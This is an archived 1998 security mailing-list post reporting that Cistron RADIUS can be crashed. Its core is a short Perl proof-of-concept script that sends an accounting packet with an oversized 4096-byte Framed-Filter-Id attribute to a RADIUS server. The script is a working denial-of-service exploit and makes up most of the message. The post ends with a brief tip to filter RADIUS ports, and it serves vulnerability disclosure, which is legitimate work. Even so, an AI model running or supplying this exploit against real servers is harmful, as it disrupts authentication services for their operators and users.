code to crash cistron's radius

From: Hamdi Tounsi (hamdi.tounsiat_private)
Date: Tue Apr 21 1998 - 03:59:08 PDT

Next message: Chris Evans: "smbmount problem?"

Previous message: Jon Lewis: "Re: Linux 2.0.33 vulnerability: oversized packets"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--35904.37635.2092
Content-Type: text/plain

cistron's radius is also vulnerable to the radius crasher i posted here last
week, since it is derived from livingston's radius 1.16. the code is simpler :

#!/usr/bin/perl
use Authen::RadiusAcct;
$r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret');
$r->load_dictionary;
$r->add_attributes(
        {Name => 'User-Name', Value => 'dummy'},
        {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
        );

$r->send_packet(4);
}

* remember to filter access to your radius servers ports to protect them.
--35904.37635.2092--

Next message: Chris Evans: "smbmount problem?"
Previous message: Jon Lewis: "Re: Linux 2.0.33 vulnerability: oversized packets"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:59 PDT